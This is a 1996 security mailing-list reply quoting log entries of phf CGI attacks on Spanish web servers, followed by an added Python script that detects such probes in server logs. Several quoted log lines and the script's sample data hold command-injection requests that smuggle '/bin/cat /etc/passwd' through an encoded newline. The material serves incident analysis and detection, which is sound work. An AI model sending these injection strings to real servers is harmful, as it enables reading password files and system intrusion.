Date: Wed, 30 Oct 1996 17:38:17 -0500 (EST)
From: Doug Breault <dbreault@ns.sprintout.com>
To: "Jordi \"Matemàtic\" Salvat" <jordi@webarna.com>
cc: www-security@ns2.rutgers.edu
In-Reply-To: <323DD2B8.4EAC@webarna.com>
Errors-To: owner-www-security@ns2.rutgers.edu

I feel like I'm having deja vu all over again... didn't this same message come across about 6 months ago??? Read the archive yet???

On Mon, 16 Sep 1996, Jordi "Matemàtic" Salvat wrote:

> Many Spanish ISPs are receiving attack attempts on their WWW servers...
> they detect them on their log files in entries such as:
>
> info26.jet.es - - [04/Sep/1996:03:17:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -
> infovia36_bcn.tinet.fut.es - - [04/Sep/1996:08:52:05 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> ia245.arrakis.es - - [04/Sep/1996:14:45:35 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> modem5.mrbit.es - - [09/Sep/1996:04:38:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> modem5.mrbit.es - - [09/Sep/1996:06:15:21 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
> ppp03.las.es - - [12/Sep/1996:20:17:22 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -
>
> Obviously attempting to get the passwd file.
>
> What is curious about these attacks is that they all come from different
> dial-up providers, from users apparently scattered throughout Spain.
> Maybe an "organized" group who meets and exchanges ideas over the I-net?
> There have also been a few attempts apparently coming from the US. Of
> course most providers have initiated action to find out who those
> cracker-apprentices are, and warn them that what they are doing is a
> delict under the new Spanish Penal Laws.
>
> At least one of these attacks has been successful. The hacker then
> reportedly managed to find out the root password (bad password choice?) and
> replaced the getty and getty to leave a 'backdoor'. The hacker was
> reportedly invisible to 'who' and 'last', so the only way to know
> whether he was logged in was to look at the process list.
>
> Does anyone know what this 'phf' cgi-bin is supposed to be?
>
> Thanks for your help.
> --
> Jordi Salvat i Alabart
> Web Edicions Barcelona
> edicions i consultoria Internet
> http://www.webarna.com
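The log entries quoted above share one signature: a request to /cgi-bin/phf whose query string carries an encoded newline (%0a) followed by a second command. The phf CGI built a shell command line from its query parameters, so an encoded newline ended the intended command and let whatever followed it run as a separate one. The following scanner, added here as an example and not part of the original thread, parses common-log-format lines like those in the post and reports such probes; the sample lines are constructed to match the pattern in the post, with invented hostnames and timestamps.

```python
"""Flag phf command-injection probes in NCSA/Apache common-log-format lines.

Added example for the www-security thread above, not code from the original
message.  Sample lines are constructed (placeholder hosts and timestamps).
"""
import re
from urllib.parse import unquote, urlsplit

# Common Log Format: host ident authuser [date] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>\S+))?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Control characters that, once URL-decoded, split a shell command line
# built from CGI input: newline (%0a), carriage return (%0d), NUL (%00).
CONTROL_CHARS = {"\n", "\r", "\x00"}


def parse_clf(line):
    """Return the CLF fields of one log line as a dict, or None if malformed."""
    m = CLF_RE.match(line.strip())
    return m.groupdict() if m else None


def is_phf_probe(target):
    """True if the request targets /cgi-bin/phf and its query string decodes
    to something containing a control character (e.g. the %0a in the post)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/cgi-bin/phf"):
        return False
    # Decode the raw query as one string so the injected newline survives.
    decoded = unquote(parts.query)
    return any(c in decoded for c in CONTROL_CHARS)


def injected_command(target):
    """Return the decoded text after the first control character, i.e. the
    command the probe tried to smuggle, or None if there is none."""
    decoded = unquote(urlsplit(target).query)
    for i, c in enumerate(decoded):
        if c in CONTROL_CHARS:
            return decoded[i + 1:].strip()
    return None


def scan_log(lines):
    """Return (host, time, status, injected_command) for every phf probe.
    Unparseable lines are skipped rather than raising."""
    hits = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None or not is_phf_probe(rec["target"]):
            continue
        hits.append((rec["host"], rec["time"], rec["status"],
                     injected_command(rec["target"])))
    return hits


# Constructed sample log, modelled on the entries quoted in the post.
SAMPLE_LOG = [
    'dialup1.example.net - - [04/Sep/1996:03:17:21 +0100] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/ HTTP/1.0" 404 -',
    'dialup2.example.net - - [04/Sep/1996:08:52:05 +0100] '
    '"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 -',
    'dialup3.example.net - - [04/Sep/1996:09:00:00 +0100] '
    '"GET /cgi-bin/phf?Qalias=smith HTTP/1.0" 200 512',   # legitimate lookup
    'dialup4.example.net - - [04/Sep/1996:09:01:00 +0100] '
    '"GET /index.html HTTP/1.0" 200 1024',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for host, when, status, cmd in scan_log(SAMPLE_LOG):
        print(f"{when}  {host}  status={status}  injected: {cmd!r}")
```

The status column matters when reading the report: the entries in the post all returned 404, meaning the server had no phf to run. A flagged line with a 200 status means the CGI was present and executed, and that host warrants a closer look at its process list and password file, as the post's successful case illustrates.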